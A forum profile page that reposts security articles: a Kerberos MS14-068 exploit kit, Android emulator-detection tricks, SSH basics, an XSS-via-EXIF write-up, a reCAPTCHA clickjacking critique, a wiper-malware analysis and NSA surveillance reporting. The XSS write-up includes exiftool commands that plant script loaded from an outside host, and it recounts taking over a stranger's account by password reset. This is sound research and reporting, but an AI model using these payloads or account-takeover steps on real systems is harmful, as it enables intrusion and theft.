-
Posts
18785 -
Joined
-
Last visited
-
Days Won
738
Everything posted by Nytro
-
Python Kerberos Exploitation Kit PyKEK (Python Kerberos Exploitation Kit), a python library to manipulate KRB5-related data. (Still in development) For now, only a few functionalities have been implemented (in a quite Quick'n'Dirty way) to exploit MS14-068 (CVE-2014-6324) . More is coming... Author Sylvain Monné Contact : sylvain dot monne at solucom dot fr http://twitter.com/bidord Special thanks to: Benjamin DELPY gentilkiwi Library content kek.krb5: Kerberos V5 (RFC 4120) ASN.1 structures and basic protocol functions kek.ccache: Credential Cache Binary Format (cchache) kek.pac: Microsoft Privilege Attribute Certificate Data Structure (MS-PAC) kek.crypto: Kerberos and MS specific cryptographic functions Exploits ms14-068.py Exploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups : Domain Users (513) Domain Admins (512) Schema Admins (518) Enterprise Admins (519) Group Policy Creator Owners (520) Sursa: https://github.com/bidord/pykek
-
Android Malware Evasion Techniques - Emulator Detection Most of the modern malware try to escape from being analysed and one of the first thing they do is to check if they are running on a controlled environment. The controlled environment refers to an emulator in the world of Android malware. If the malware runs on an emulator, that means it is most probably being investigated by a researcher. There are various methods that malware writers use to detect the emulated environment. 1.) Check Product Name: In Android emulator, product name of the device contains "sdk" string so it is a useful clue to detect if the app is running on an emulator. In order to check the product name, you can use the following code snippet: 2.) Check Model Name: The default product name of the Android emulator contains "sdk" string. So it is worth to check model name in order to detect emulator use. 3.) Check SIM Operator Name: In Android emulators, the SIM operator name comes with the default "Android" string. It is not the case that you can see in regular physical devices even there is no SIM card installed in the device. 4.) Check Network Operator Name: Similar to the SIM Operator Name, the network operator name also comes with the default "Android" string. It is a good idea to check network operator name in order to decide if the app is running on an emulator. By combining these 4 techniques mentioned above, you can write a basic Android app that shows these values. In order to compare if they are really work, you can install the app both to the emulator and a real device. The picture on the left hand side is the screenshot taken from Samsung Galaxy S4 phone and the one on the right is the screenshot of an emulator. You can see the difference clearly. 5.) Check ro.kernel.qemu and ro.secure Property: Additionally you can check the Android system properties to detect emulated environment. There are various property files in Android filesystem: /default.prop /system/build.prop /data/local.prop Properties are stored in a key value pair format in these property files. You can see the values of the properties by typing adb shell getprop <key> command. There are some critical properties indicating the emulator environment. ro.secure ro.kernel.qemu If the value of ro.secure is "0", or the value of ro.kernel.qemu is 1, ADB shell runs as root and that means the environment which, the app is running is an emulator. Because in a physical device ADB shell runs in a regular user right, not the root. In order to check these properties you can use the code snippets below. I uploaded a sample detecttion code to my Github page that combines all the methods above: https://github.com/oguzhantopgul/Android-Emulator-Detection In this blog post i tried to mention about my favourite Android Emulator detection methods. If you know much better techniques please send me a comment. Edit: I've just noticed the Tim Strazzere's (@timstrazz) Android Project on emulator detection. You can find it in his github repo link below: https://github.com/strazzere/anti-emulator Yesterday, Oguzhan Topgul taraf?ndan yay?nland? Sursa: {ouz}: Android Malware Evasion Techniques - Emulator Detection
-
Getting started with SSH security and configuration Are you a new UNIX administrator who needs to be able to run communication over a network in the most secure fashion possible? Brush up on the basics, learn the intricate details of SSH, and delve into the advanced capabilities of SSH to automate securely your daily system maintenance, remote system management, and use within advanced scripts to manage multiple hosts. PDF (391 KB) | Roger Hill (unixman@charter.net), Independent author What is SSH? A basic description Secure Shell (SSH) was intended and designed to afford the greatest protection when remotely accessing another host over the network. It encrypts the network exchange by providing better authentication facilities as well as features such as Secure Copy (SCP), Secure File Transfer Protocol (SFTP), X session forwarding, and port forwarding to increase the security of other insecure protocols. Various types of encryption are available, ranging from 512-bit encryption to as high as 32768 bits, inclusive of ciphers, like Blowfish, Triple DES, CAST-128, Advanced Encryption Scheme (AES), and ARCFOUR. Higher-bit encryption configurations come at a cost of greater network bandwidth use. Figure 1 and Figure 2 show how easily a telnet session can be casually viewed by anyone on the network using a network-sniffing application such as Wireshark. Figure 1. Telnet protocol sessions are unencrypted. Frequently used acronyms API: Application programming interface FTP: File Transfer Protocol IETF: Internet Engineering Task Force POSIX: Portable Operating System Interface for UNIX RFC: Request for Comments VPN: Virtual private network When using an unsecured, "clear text" protocol such as telnet, anyone on the network can pilfer your passwords and other sensitive information. Figure 1 shows user fsmythe logging in to a remote host through a telnet connection. He enters his user name fsmythe and password r@m$20!0, which are both then viewable by any other user on the same network as our hapless and unsuspecting telnet user. Figure 2. SSH protocol sessions are encrypted. Figure 2 provides an overview of a typical SSH session and shows how the encrypted protocol cannot be viewed by any other user on the same network segment. Every major Linux® and UNIX® distribution now comes with a version of the SSH packages installed by default—typically, the open source OpenSSH packages—so there is little need to download and compile from source. If you're not on a Linux or UNIX platform, a plethora of open source and freeware SSH-based tools are available that enjoy a large following for support and practice, such as WinSCP, Putty, FileZilla, TTSSH, and Cygwin (POSIX software installed on top the Windows® operating system). These tools offer a UNIX- or Linux-like shell interface on a Windows platform. Whatever your operating system, SSH touts many positive benefits for commonplace, everyday computing. Not only is it dependable, secure, and flexible, but it is also simple to install, use, and configure—not to mention feature laden. SSH architecture IETF RFCs 4251 through 4256 define SSH as the "Secure Shell Protocol for remote login and other secure network services over an insecure network." The shell consists of three main elements (see Figure 3): Transport Layer Protocol: This protocol accommodates server authentication, privacy, and integrity with perfect forward privacy. This layer can provide optional compression and is run over a TCP/IP connection but can also be used on top of any other dependable data stream. User Authentication Protocol: This protocol authenticates the client to the server and runs over the transport layer. Connection Protocol: This protocol multiplexes the encrypted tunnel to numerous logical channels, running over the User Authentication Protocol. Figure 3. SSH protocol logical layers The transport layer is responsible for key exchange and server authentication. It sets up encryption, integrity verification, and (optionally) compression and exposes to the upper layer an API for sending and receiving plain text packets. A user authentication layer provides authentication for clients as well as several authentication methods. Common authentication methods include password, public key, keyboard-interactive, GSSAPI, SecureID, and PAM. The connection layer defines channels, global requests, and the channel requests through which SSH services are provided. A single SSH connection can host multiple channels concurrently, each transferring data in both directions. Channel requests relay information such as the exit code of a server-side process. The SSH client initiates a request to forward a server-side port. This open architecture design provides extensive flexibility. The transport layer is comparable to Transport Layer Security (TLS), and you can employ custom authentication methods to extend the user authentication layer. Through the connection layer, you can multiplex secondary sessions into a single SSH connection (see Figure 4). Articol complet: Getting started with SSH security and configuration
-
Finding Zero-Day XSS Vulns via Doc Metadata Posted by eskoudis Filed under Methodology, web pen testing [Editor's Note: Chris Andre Dale has a nice article for us about cross-site-scripting attacks, and he's found a ton of them in various high-profile platforms on the Internet, especially in sites that display or process images. He even found one in WordPress and responsibly disclosed it, resulting in a fix for the platform released just a few weeks ago. In this article, Chris shares his approach and discoveries, with useful lessons for all pen testers. Oh... and if you are going to test systems, make sure you have appropriate permission and don't do anything that could break a target system or harm its users. Thanks for the article, Chris! --Ed.] By Chris Andre Dale XSS Here, XSS There, XSS Everywhere! Today Cross-Site Scripting (XSS) is very widespread. While it is not a newly discovered attack vector, we still see it all the time in the wild. Do you remember back in the days, when you would click on a website's guestbook, and suddenly you would have tons of pop-ups or redirections happen? Yeah, that's often XSS for you. Today I see XSS vulnerabilities in almost all of the penetration testing engagements that I conduct. Even to this very day, there is evidence of old XSS worms stuck on the web. Remember MySpace? Yeah, me neither. Make a Google search for "Samy is my hero site:myspace.com". You will see thousands of ghostly remains of a XSS worm back from 2006! The infamous Samy worm does not still linger, but what you are seeing is the remains of MySpace profiles that were victims of this worm back in 2006. XSS is usually ranked only as a medium impact when exploited. For instance, OWASP has rated this vulnerability as a moderate impact. I disagree on this. In many cases XSS can be truly brutal and potentially life threatening. What do I mean? When XSS is bundled with other vulnerabilities, such as Cross-Site Request Forgery (CSRF), we can quickly imagine some very nasty scenarios. What if your XSS exploit hooks an IT Operations administrator, and through the XSS you add your CSRF payloads to perform administrative functions to their HVAC solutions? Alternatively, consider the unfortunate event where an attacker has successfully compromised thousands of hosts, using them all to DDOS an unsuspected victim. New XSS attack vectors arise all the time, however we don't often see something truly new or untraditional. Wouldn't it be cool to see something else other than just your ordinary filter bypass? In this article, I'll cover how I've successfully found 0-day exploits in WordPress, public sites and plugins for popular CMS systems, by merely using using this technique. Let's take a look at embedding XSS payloads into image metadata, more specifically EXIF data in JPEG images. This can be accomplished several ways. If you are old school (or perhaps just old , you can accomplish this by modifying your camera settings: The camera type used here is a Canon(1) camera. Any hacker with any respect for themselves, uses ExifTool(2) by Phil Harvey to accomplish the task. The following command allows us to add/overwrite an exif tag, specifically the camera type that has allegedly been used to take this photograph: exiftool.exe -"Camera Model Name"="// " "C:\research.jpg" Let's not just add the model name, let's extend it to other values as well: As you can see, we've added the standard javascript alert code to a whole set of different EXIF data fields. Now we'll create a simple PHP script that will mimic a real world example of a system that uses EXIF data: <?php $filename = $_GET['filename']; echo $filename . " \n"; $exif = exif_read_data('tests/' . $filename, 'IFD0'); echo $exif===false ? "No header data found. \n" : "Image contains headers \n"; $exif = exif_read_data('tests/' . $filename, 0, true); foreach ($exif as $key => $section) { foreach ($section as $name => $val) { echo "$key.$name: $val \n"; } } ?> The above script will simply iterate through all EXIF data keys it finds and will output the respective value. For testing purposes, this is exactly what we want. PHP's EXIF parser does not have filtering in place by default, making it very interesting to test this attack vector. In cases where a developer has forgotten to do sanitization on these fields, we may have a successful attack. Developers think, in many cases, that some of their data is read-only, so why would they EVER need to sanitize it?! Common mistake... Using the script above, and armed with our the metadata-bombed picture, we can try to attack ourselves through the demo script. In the following picture, we have told the script to fetch our metadata-bombed picture, simply illustrating the attack with a JavaScript pop-up: So what? We've successfully attacked ourselves with a pop-up message? Well, there is so much more to this than just attacking ourselves. First of all, we've verified that there is no built-in filtering in the PHP exif_read_data function. That means that all developers need to remember is to apply filtering manually, and as we covered before, we all know that developers always remember this... Secondly, we've verified that we can gain executable JavaScript in someone's browser. From here, we can simply rewrite our pop-up payload to something much more subtle and evil, such as introducing a BeEF hook. More on this later. Scouring For 0 Day's Armed with a fully metadata-bombed picture, I set sail into the Wild Wild Web. I had to check whether my assumptions of developers failing to sanitize the EXIF data was true or not. From there, I roamed into the depths of picture upload sites... I started googling "upload picture", "picture sharing", "photograph sharing" and much more. On the sites that I found interesting, I registered an account and started uploading my pictures. On a side note, Mailinator(3) comes in handy doing this kind of research. In fact, I registered with the account no-reply@mailinator.com for most of the sites, however, to my great surprise, one of the sites already had an account with this username! What?! Someone had actually registered with this account before? Then undoubtedly, I could do a password reset! Sure enough, doing a password reset, I gained access to someone else's account. Whew... Now, who would EVER register an account on a Mailinator address for their private pictures? Another security researcher? Criminals? Where do I go from here? Do I really want to venture into someone else's account? If so, what will I find? Regardless of my questions and doubt, I decided to continue, knowing surely that there is no turning back from what I might be about to see. To my surprise, and more importantly, to my relief, the site contained a bunch of family vacation pictures from a trip to Indonesia. Many of the sites required registration, while many of them did not show any metadata at all. Out of 21 sites tested, 11 sites did not have a feature to display EXIF data, 7 sites had at least rudimentary filtering and 3 sites were found to be vulnerable. Not amazing numbers, however still fun to see it working in the wild, outside of my lab. What do I mean by rudimentary filtering? Well, it just means I didn't try to bypass the filtering. Additionally, I tested the attack vector on 3 WordPress plugins, whereas 2 were found vulnerable and one had the appropriate filtering in place. Responsible disclosure against the sites and plugins has been conducted. Some of the examples in this article have been anonymized because as of the launch of the article, they have still not patched the issue. Keep in mind, many of the sites that were applying filtering could still be vulnerable. I did not conduct any filter bypass in my testing. My gut feeling is that the filters were very rudimentary and could easily be bypassed. First, here is an example from 500px.com which was not found to be vulnerable: You can see the payload present in the title and the camera is automatically populated by the site. That means that instead of prompting me to set a title for my picture, the site used one of the EXIF data fields to pre-populate it for me. Interesting...this was something I saw as a repeating characteristic when doing my testing. Flickr also did appropriate filtering, keeping in mind, no filter bypass has been tried: One particular site did not like my testing at all. When trying to upload my picture, it seemed to break something: Anyway, we're not here for the failures, are we? We're here for the success stories! Ahh, this is the wonderful world of hacking...gaining success through other people's failures... *evil grin* Here is a site where we can see our attack manifest itself. Just by uploading the picture and then viewing it, it triggers this vulnerability: I also found the same vulnerability at other sites. We can see the image I've uploaded in the background -- a princess and a unicorn. Sadly, no farting rainbows... Many of the big sites were also tested, such as Google Plus, DeviantArt, and Photobucket. These were all applying some filtering. A site, however, that did not apply the necessary filtering was Wordpress. In the screenshot above I've successfully uploaded an image, by accessing it through its respective attachment page. Remember, I am using a harmless payload, just alerting a text message. This could be a completely stealthy attack payload if I wanted it to be. Let's dive further into the WordPress finding. The Wordpress Exploit WordPress is the most popular blogging platform on the internet today, ranking up more than 60 million websites in 2012 (4). Finding working exploits in such a platform can be very interesting for many actors, hence they also have a working bug bounty program (5). The vulnerability I'm demonstrating in this paper has been submitted to WordPress through responsible disclosure, and we held this article until they had properly patched the issue. The WordPress vulnerability manifests when an administrator, or editor, uploads an image with the ImageDescription EXIF data tag set to a JavaScript payload. The exploit works only for the user accounts as more strict filtering is put on the other accounts. This has sparked some controversy about this vulnerability, however, as I will prove in this article, we will create an attack that is fully stealthy, allowing the attack to take place without an administrator knowing what is going on. Why the controversy? With WordPress, and other CMS systems such as Sharepoint, some roles are allowed to upload HTML elements. With WordPress, administrators and editors are allowed to implement unfiltered HTML (6). The other side of the controversy is how the attack can be made super stealthy. The administrator has very limited ways to realize that he is doing something wrong and actually uploading malware into his site. Now, that's cool! This is also why WordPress has chosen to patch this issue. Embedding some JavaScript into the tag and then uploading it will trigger the vulnerability once a user views the attachment page of the image. Using Exiftool, you can accomplish this with the following command: Here I've changed my JavaScript payload to a reference instead of embedding the JavaScript file itself in the image. This will give us increased flexibility when creating working payloads. exiftool.exe -"ImageDescription"="<script src=\"http://pentesting.securesolutions.no/js.js\">" paramtest1.jpg The following example is one of my first runs of the attack. It is not stealthy as the administrator can easily pick up that something is wrong, simply by looking at the title element of the page. WordPress uses the ImageDescription element to populate the title element, and properly filters before doing so. We'll see soon how to bypass this. The attack works when you navigate to the attachment page, however any WordPress editor with IQ higher than their shoe-size would most likely realize that something is fishy, immediately deleting the picture. If we stopped at this point, I don't think the issue would warrant a patch or much attention at all, however the next steps allows us to go into stealth mode. If I figured out a way for the payload to be embedded, but without the title element being overridden, I could make the attack feasible. Luckily, I discovered a small artifact when doing the testing. Trying different types of encoding, and other obfuscation techniques, produced some really long strings. When producing a long enough string, I noticed that WordPress suddenly defaulted to using the filename as the title element! Nice! The following Exiftool command makes WordPress ignore the ImageDescription, allowing a more stealthy attack: exiftool.exe -"ImageDescription"=" <script src\"http://pentesting.securesolutions.no/js.js\"></script>" paramtes1.jpg Notice all the extra spaces. This extra padding makes WordPress think that this is too long for the title field, thus defaulting to simply using the filename. The attack now manifests more beautifully when we upload the picture: The picture loads normally. Our XSS vector is currently invisible. Here is what happens when someone, e.g. the administrator, visits the picture: The screenshot shows how I've successfully included my malicious JavaScript. This could be a simple BEeF(7) hook, allowing us a very high level of control of the victims. From here, it's game over. Best Regards, Cross-Site Scripting Why stop at EXIF data? What about other types of data, perhaps not in the same magnitude as online EXIF parsers, but let's look at embedding XSS into other data. What if a webpage allowed you to upload a Word document , and it would then automatically extract the Author field of the document and embed it on the site? That could definitely lead to a vulnerability. It sounds like a good vector for a XSS attacks, or even other types of attacks such as SQL Injection if they store the information in a database. When I look at the document I'm writing right now, I can see the following metadata information: Without a doubt, many of these parameters can easily be changed by the user, either through Exiftool or using the word processor itself. The following example shows editing the username to a XSS payload. I do apologize for the Norwegian text; I've been cursed with a Norwegian installation of Windows and Office by my IT-department. Pictures and documents. What about audio? Here is an example adding XSS to an mp3 file through the awesome free, and open-source, tool Audacity (8): There are probably tons of other situations where we can add these types of attacks. It's up to us to find them before the bad guys does. Conclusion Let's consider the future. The data we embed in metadata today might, sometime in the future, exploit services that has not yet been developed. Perhaps, we'll see XSS shooting out from projectors, chat services, glasses (e.g. Google Glass) or robots going crazy having alert(1)'s all over the place. Or perhaps even cooler, your files embedded with XSS today might someday, in the future, trigger a callback connection straight back to your BEeF hook... The bottom line is, data coming from a third party system, being a user or another system, should be sanitized! You know that whole concept of garbage in, garbage out? Let's stop that. Additionally, it is important for pen testers to have this information in their arsenal when doing their testing. The testers need to think outside the box and cover as much testing surface as possible. Also, Ed Skoudis had a student who mentioned some great research that has been made on sites processing metadata. I recommend checking out the research done at embeddedmetadata.org (9). It might spark some further testing and research for some of our readers. Now, go onward my friends and... References: http://www.amazon.com/Canon-CMOS-Digital-Camera-3-0-Inch/dp/B0040JHVCC http://www.sno.phy.queensu.ca/~phil/exiftool/ http://mailinator.com/ With 60 Million Websites, WordPress Rules The Web. So Where's The Money? - Forbes Security — Automattic WordPress Security Bug Bounty Program - White Fir Design BeEF - The Browser Exploitation Framework Project Audacity: Free Audio Editor and Recorder Embedded Metadata Initiative -Chris Andre Dale Sursa: SANS Penetration Testing | Finding Zero-Day XSS Vulns via Doc Metadata | SANS Institute
-
The No CAPTCHA problem When I read about No CAPTCHA for the first time I was really excited. Did we finally find a better solution? Hashcash? Or what? Finally it's available and the blog post disappointed me a bit. Here's Wordpress registration page successfully using No CAPTCHA. Now let's open it in incognito tab... Wait, annoying CAPTCHA again? But i'm a human! So what Google is trying to sell us as a comprehensive bot detecting algorithm is simply a whitelist based on your previous online behavior, CAPTCHAs you solved. Essentially - your cookies. Under the hood they replaced challenge/response pairs with token "g-recaptcha-response". Good guys get it "for free", bad guys still have to solve a challenge. Does it make bot's job harder? No at all. The legacy flow is still available and old OCR bots can keep recognizing. But what about new "find a similar image" challenges? Bots can't do that! As long as $1 per hour is ok for many people in 3rd world, bots won't need to solve new challenges. No matter how complex they are, bots simply need to get the JS code of challenge, show it to another human being (working for cheap or just a visitor on popular websites) and use the answer that human provided. The thing is No CAPTCHA actually introduces a new weakness! Abusing clickjacking we can make the user (a good guy) generate g-recaptcha-response for us - make a click (demo bot for wordpress). Then we can use this g-recaptcha-response to make a valid request to the victim (from our server or from user's browser). It's pretty much a serious weakness of new reCAPTCHA - instead of making everyone recognize those images we can make a bunch of good "trustworthy" users generate g-recaptcha-response-s for us. Bot's job just got easier! You're probably surprised, how can we use 3rd party data-sitekey on our website? Don't be - the Referrer-based protection was pretty easy to bypass with <meta name="referrer" content="never">. P.S. Many developers still think you need to wait a while to get a new challenge. @homakov I've used them in the past, accuracy is about 80% and response time about 10 seconds per attempt. Still too slow for some attacks. — Stephen de Vries (@stephendv) December 4, 2014 In fact you can prepare as many challenges as you want and then start spaming later. It's another reCAPTCHA weakness that will never be fixed. Author: Egor Homakov on 3:52 AM Sursa: Egor Homakov: The No CAPTCHA problem
-
[h=1]FFmpeg 2.5 Officially Released[/h]By Silviu Stahie The developers have added some new features A new FFmpeg version is out FFmpeg is a complete solution to record, convert, and stream audio and video and it was just upgraded to a new major version, 2.5. It comes with a lot of new features and it's pretty interesting. FFmpeg 2.5 has been dubbed "Bohr" and comes just 2.5 months after the previous release. There are not as many changes as you might think, but there are more than enough to keep users interested. "2.5 was released on 2014-12-04. It is the latest stable FFmpeg release from the 2.5 release branch, which was cut from master on 2014-12-04. Amongst lots of other changes, it includes all changes from ffmpeg-mt, libav master of 2014-12-03, libav 11 as of 2014-12-03,” reads the official announcement. Some of the updated packages in the latest FFmpeg framework include libavutil, libavcodec, libavformat, libavdevice, libavfilter, libavresample, libswscale, libswresample, and libpostproc. The devs have also said that the STL subtitle decoder is now supported, the XCB-based screen-grabber is now working properly, a SUP/PGS subtitle demuxer is now available, a number of fixes have been implemented as well. FFmpeg is the leading multimedia framework able to decode, encode, transcode, mux, demux, stream, filter, and play pretty much any media that humans and machines have created. A complete list of updates, features, and other fixes can be found in the official announcement. You can download FFmpeg 2.5 source package right now from Softpedia. Sursa: FFmpeg 2.5 Officially Released - Softpedia
-
GCHQ boffins quantum-busted its OWN crypto primitive 'Soliloquy' only ever talked to itself By Richard Chirgwin, 3 Dec 2014 While the application of quantum computers to cracking cryptography is still, for now, a futuristic scenario, crypto researchers are already taking that future seriously. It came as a surprise to Vulture South to find that in October of this year, researchers at GCHQ's information security arm the CESG abandoned work on a security primitive because they discovered a quantum attack against it. Presented to the ETSI here, with the full paper here, the documents outline the birth and death of a primitive the CESG called Soliloquy. Primitives are building blocks in the dizzyingly-complex business of assembling a cryptosystem: individual modules that are expected to be very well-characterised before they're accepted into security standards (and, in the case of crypto like RC4, dropped when they're no longer safe). Given that improving computer power is one of the ways a primitive can be broken, there's a constant background research effort into both creating the primitives of the future, and testing them before they're adopted – and that's where Soliloquy comes in. As the CESG paper states, Soliloquy was first proposed in 2007 as a cyclic-lattice key exchange primitive supporting between 3,000 and 10,000 bits for the public key. Between 2010 and 2013 – presumably as part of their effort to case-harden the primitive before releasing it into the wild – the boffins (Peter Campbell, Michael Groves and Dan Shepherd) developed what they call “a reasonably efficient quantum attack on the primitive”, and as a result, they cancelled the project. The quantum algorithm they describe would work by creating a quantum fingerprint of the lattice Soliloquy creates; “discreteise and bound” the control space needed; and run a quantum Fourier transform over that control space, iteratively to get lots of samples approximating the lattice. That's where the quantum attack is complete: after that, the samples would get fed into a classical lattice-based algorithm to recover the values you want – in other words, the key. The main challenge, the authors write, is to define “to define a suitable quantum fingerprinter” that could handle the control space. As the researchers drily note in their conclusion, “designing quantum-resistant cryptography is a difficult task”, and while researchers are starting to create such algorithms for deployment, “we caution that much care and patience will be required” to provide a thorough security assessment of any such protocol. ® Sursa: GCHQ boffins quantum-busted its OWN crypto primitive • The Register
-
An Analysis of the “Destructive” Malware Behind FBI Warnings 4:06 pm (UTC-7) | by Trend Micro TrendLabs engineers were recently able to obtain a malware sample of the “destructive malware” described in reports about the Federal Bureau of Investigation (FBI) warning to U.S. businesses last December 2. According to Reuters, the FBI issued a warning to businesses to remain vigilant against this new “destructive” malware in the wake of the recent Sony Pictures attack. As of this writing, the link between the Sony breach and the malware mentioned by the FBI has yet to be verified. The FBI flash memo titled “#A-000044-mw” describes an overview of the malware behavior, which reportedly has the capability to override all data on hard drives of computers, including the master boot record, which prevents them from booting up. Below is an analysis of our own findings: Analysis of the BKDR_WIPALL Malware Our detection for the malware detailed in the FBI report is BKDR_WIPALL. Below is a quick overview of the infection chain for this attack. The main installer here is diskpartmg16.exe (detected as BKDR_WIPALL.A). BKDR_WIPALL.A’s overlay is encrypted with a set of user names and passwords as seen in the screenshot below: Figure 1. BKDR_WIPALL.A’s overlay contains encrypted user names and passwords These user names and passwords are found to be encrypted by XOR 0x67 in the overlay of the malware sample and are then used to log into the shared network. . Once logged in, the malware attempts to grant full access to everyone that will access the system root. Figure 2. Code snippet of the malware logging into the network The dropped net_var.dat contains a list of targeted hostnames: Figure 3. Targeted host names The next related malware is igfxtrayex.exe (detected as BKDR_WIPALL., which is dropped by BKDR_WIPALL.A. It sleeps for 10 minutes (or 600,000 milliseconds as seen below) before it carries out its actual malware routines: Figure 4. BKDR_WIPALL.B (igfxtrayex.exe) sleeps for 10 minutes Figure 5. Encrypted list of usernames and passwords also present in BKDR_WIPALL.B Figure 6. Code snippet of the main routine of igfxtrayex.exe (BKDR_WIPALL. This malware’s routines, aside from deleting users’ files, include stopping the Microsoft Exchange Information Store service. After it does this, the malware sleeps for another two hours. It then forces the system to reboot. Figure 7. Code snippet of the force reboot It also executes several copies of itself named taskhost{random 2 characters}.exe with the following parameters: taskhost{random 2 characters}.exe -w – to drop and execute the component Windows\iissvr.exe taskhost{random 2 characters}.exe -m – to drop and execute Windows\Temp\usbdrv32.sys taskhost{random 2 characters}.exe -d – to delete files in all fixed or remote (network) drives Figure 8. The malware deletes all the files (format *.*) in fixed and network drives The malware components are encrypted and stored in the resource below: Figure 9. BKDR_WIPALL.B malware components Additionally, BKDR_WIPALL.B accesses the physical drive that it attempts to overwrite: Figure 10. BKDR_WIPALL.B overwrites physical drives We will be updating this post with our additional analysis of the WIPALL malware. Analysis by Rhena Inocencio and Alvin Bacani Update as of December 3, 2014, 5:30 PM PST Upon analysis of the same WIPALL malware family, its variant BKDR_WIPALL.D drops BKDR_WIPALL.C, which in turn, drops the file walls.bmp in the Windows directory. The .BMP file is as pictured below: Figure 11. Dropped wallpaper This appears to be the same wallpaper described in reports about the recent Sony hack last November 24 bearing the phrase “hacked by #GOP.” Therefore we have reason to believe that this is the same malware used in the recent attack to Sony Pictures. Note that BKDR_WIPALL.C is also the dropped named as igfxtrayex.exe in the same directory of BKDR_WIPALL.D. We will update this blog entry for more developments. Additional analysis by Joie Salvio Sursa: An Analysis of the "Destructive" Malware Behind FBI Warnings
-
How the NSA Hacks Cellphone Networks Worldwide By Ryan Gallagher @rj_gallagher In March 2011, two weeks before the Western intervention in Libya, a secret message was delivered to the National Security Agency. An intelligence unit within the U.S. military’s Africa Command needed help to hack into Libya’s cellphone networks and monitor text messages. For the NSA, the task was easy. The agency had already obtained technical information about the cellphone carriers’ internal systems by spying on documents sent among company employees, and these details would provide the perfect blueprint to help the military break into the networks. The NSA’s assistance in the Libya operation, however, was not an isolated case. It was part of a much larger surveillance program—global in its scope and ramifications—targeted not just at hostile countries. According to documents contained in the archive of material provided to The Intercept by whistleblower Edward Snowden, the NSA has spied on hundreds of companies and organizations internationally, including in countries closely allied to the United States, in an effort to find security weaknesses in cellphone technology that it can exploit for surveillance. The documents also reveal how the NSA plans to secretly introduce new flaws into communication systems so that they can be tapped into—a controversial tactic that security experts say could be exposing the general population to criminal hackers. Codenamed AURORAGOLD, the covert operation has monitored the content of messages sent and received by more than 1,200 email accounts associated with major cellphone network operators, intercepting confidential company planning papers that help the NSA hack into phone networks. One high-profile surveillance target is the GSM Association, an influential U.K.-headquartered trade group that works closely with large U.S.-based firms including Microsoft, Facebook, AT&T, and Cisco, and is currently being funded by the U.S. government to develop privacy-enhancing technologies. Karsten Nohl, a leading cellphone security expert and cryptographer who was consulted by The Intercept about details contained in the AURORAGOLD documents, said that the broad scope of information swept up in the operation appears aimed at ensuring virtually every cellphone network in the world is NSA accessible. The operation appears aimed at ensuring virtually every cellphone network in the world is NSA accessible. “Collecting an inventory [like this] on world networks has big ramifications,” Nohl said, because it allows the NSA to track and circumvent upgrades in encryption technology used by cellphone companies to shield calls and texts from eavesdropping. Evidence that the agency has deliberately plotted to weaken the security of communication infrastructure, he added, was particularly alarming. “Even if you love the NSA and you say you have nothing to hide, you should be against a policy that introduces security vulnerabilities,” Nohl said, “because once NSA introduces a weakness, a vulnerability, it’s not only the NSA that can exploit it.” NSA spokeswoman Vanee’ Vines told The Intercept in a statement that the agency “works to identify and report on the communications of valid foreign targets” to anticipate threats to the United States and its allies. Vines said: “NSA collects only those communications that it is authorized by law to collect in response to valid foreign intelligence and counterintelligence requirements—regardless of the technical means used by foreign targets, or the means by which those targets attempt to hide their communications.” Network coverage The AURORAGOLD operation is carried out by specialist NSA surveillance units whose existence has not been publicly disclosed: the Wireless Portfolio Management Office, which defines and carries out the NSA’s strategy for exploiting wireless communications, and the Target Technology Trends Center, which monitors the development of new communication technology to ensure that the NSA isn’t blindsided by innovations that could evade its surveillance reach. The center’s logo is a picture of the Earth overshadowed by a large telescope; its motto is “Predict – Plan – Prevent.” The NSA documents reveal that, as of May 2012, the agency had collected technical information on about 70 percent of cellphone networks worldwide—701 of an estimated 985—and was maintaining a list of 1,201 email “selectors” used to intercept internal company details from employees. (“Selector” is an agency term for a unique identifier like an email address or phone number.) From November 2011 to April 2012, between 363 and 1,354 selectors were “tasked” by the NSA for surveillance each month as part of AURORAGOLD, according to the documents. The secret operation appears to have been active since at least 2010. The information collected from the companies is passed onto NSA “signals development” teams that focus on infiltrating communication networks. It is also shared with other U.S. Intelligence Community agencies and with the NSA’s counterparts in countries that are part of the so-called “Five Eyes” surveillance alliance—the United Kingdom, Canada, Australia, and New Zealand. Aside from mentions of a handful of operators in Libya, China, and Iran, names of the targeted companies are not disclosed in the NSA’s documents. However, a top-secret world map featured in a June 2012 presentation on AURORAGOLD suggests that the NSA has some degree of “network coverage” in almost all countries on every continent, including in the United States and in closely allied countries such as the United Kingdom, Australia, New Zealand, Germany, and France. One of the prime targets monitored under the AURORAGOLD program is the London-headquartered trade group, the GSM Association, or the GSMA, which represents the interests of more than 800 major cellphone, software, and internet companies from 220 countries. The GSMA’s members include U.S.-based companies such as Verizon, AT&T, Sprint, Microsoft, Facebook, Intel, Cisco, and Oracle, as well as large international firms including Sony, Nokia, Samsung, Ericsson, and Vodafone. The trade organization brings together its members for regular meetings at which new technologies and policies are discussed among various “working groups.” The Snowden files reveal that the NSA specifically targeted the GSMA’s working groups for surveillance. Claire Cranton, a spokeswoman for the GSMA, said that the group would not respond to details uncovered by The Intercept until its lawyers had studied the documents related to the spying. “If there is something there that is illegal then they will take it up with the police,” Cranton said. By covertly monitoring GSMA working groups in a bid to identify and exploit security vulnerabilities, the NSA has placed itself into direct conflict with the mission of the National Institute for Standards and Technology, or NIST, the U.S. government agency responsible for recommending cybersecurity standards in the United States. NIST recently handed out a grant of more than $800,000 to GSMA so that the organization could research ways to address “security and privacy challenges” faced by users of mobile devices. The revelation that the trade group has been targeted for surveillance may reignite deep-seated tensions between NIST and NSA that came to the fore following earlier Snowden disclosures. Last year, NIST was forced to urge people not to use an encryption standard it had previously approved after it emerged NSA had apparently covertly worked to deliberately weaken it. Jennifer Huergo, a NIST spokewoman, told The Intercept that the agency was “not aware of any activities by NSA related to the GSMA.” Huergo said that NIST would continue to work towards “bringing industry together with privacy and consumer advocates to jointly create a robust marketplace of more secure, easy-to-use, privacy-enhancing solutions.” GSMA headquarters in London (left) Encryption attack The NSA focuses on intercepting obscure but important technical documents circulated among the GSMA’s members known as “IR.21s.” Most cellphone network operators share IR.21 documents among each other as part of agreements that allow their customers to connect to foreign networks when they are “roaming” overseas on a vacation or a business trip. An IR.21, according to the NSA documents, contains information “necessary for targeting and exploitation.” The details in the IR.21s serve as a “warning mechanism” that flag new technology used by network operators, the NSA’s documents state. This allows the agency to identify security vulnerabilities in the latest communication systems that can be exploited, and helps efforts to introduce new vulnerabilities “where they do not yet exist.” The IR.21s also contain details about the 